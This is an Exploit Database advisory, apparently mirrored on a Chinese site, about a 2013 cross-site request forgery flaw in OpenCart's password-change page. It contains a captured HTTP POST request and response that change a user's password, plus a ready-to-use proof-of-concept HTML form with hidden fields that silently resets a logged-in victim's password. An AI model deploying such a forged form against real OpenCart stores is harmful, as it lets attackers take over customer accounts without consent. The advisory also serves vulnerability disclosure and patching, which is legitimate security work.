OpenCart – Cross-Site Request Forgery (Change User Password)

• Exploit Database
• 30 阅读

• 作者： Saadi Siddiqui
  日期： 2013-04-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24921/

• # Exploit Title		: OpenCart CSRF
  # Date			: 2013/4/2
  # Exploit Author	: Saadat Ullah ， saadi_linux@rocketmail.com
  # Software Link 	: http://www.opencart.com/index.php?route=download/download
  					: https://github.com/opencart
  # Software web	: www.opencart.com
  # Author HomePage	: http://security-geeks.blogspot.com/
  # Tested on: Server : Apache/2.2.15 PHP/5.3.3
  
  # Cross-site request forgery
  
  OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
  
  OpenCart is not using any security token to prevent it against CSRF.
  It is vulnerable to all location inside User panel.
  
  Header
  
  ----------------------------------------------------------
  http://localhost/index.php?route=account/password
  
  POST /index.php?route=account/password HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Cookie: PHPSESSID=e634322aa558022cdd8664b8d32124b7; language=en; currency=USD
  Connection: keep-alive
  Content-Type: multipart/form-data; boundary=---------------------------2465524120551
  Content-Length: 257
  -----------------------------2465524120551
  Content-Disposition: form-data; name="password"
  
  123456789
  -----------------------------2465524120551
  Content-Disposition: form-data; name="confirm"
  
  123456789
  -----------------------------2465524120551--
  
  Response
  
  HTTP/1.1 302 Found
  Date: Tue, 02 Apr 2013 14:49:53 GMT
  Server: Apache
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Status: 302
  Location: http://localhost/index.php?route=account/account
  Content-Length: 0
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html
  ----------------------------------------------------------
  
  Simple Poc to change user Password
  
  <form action="http://localhost/index.php?route=account/password" method="post" enctype="multipart/form-data">
   
  <div class="content">
  <table class="form">
  <tbody><tr>
  
  <td><input name="password" value="987654321" type="hidden">
  </td>
  </tr>
  <tr>
   
  <td><input name="confirm" value="987654321" type="hidden">
  </td>
  </tr>
  </tbody></table>
  </div>
  <div class="buttons">
  
  <div class="right"><input value="Continue" class="button" type="submit"></div>
  </div>
  </form>
  
  #Independent Pakistani Security Researcher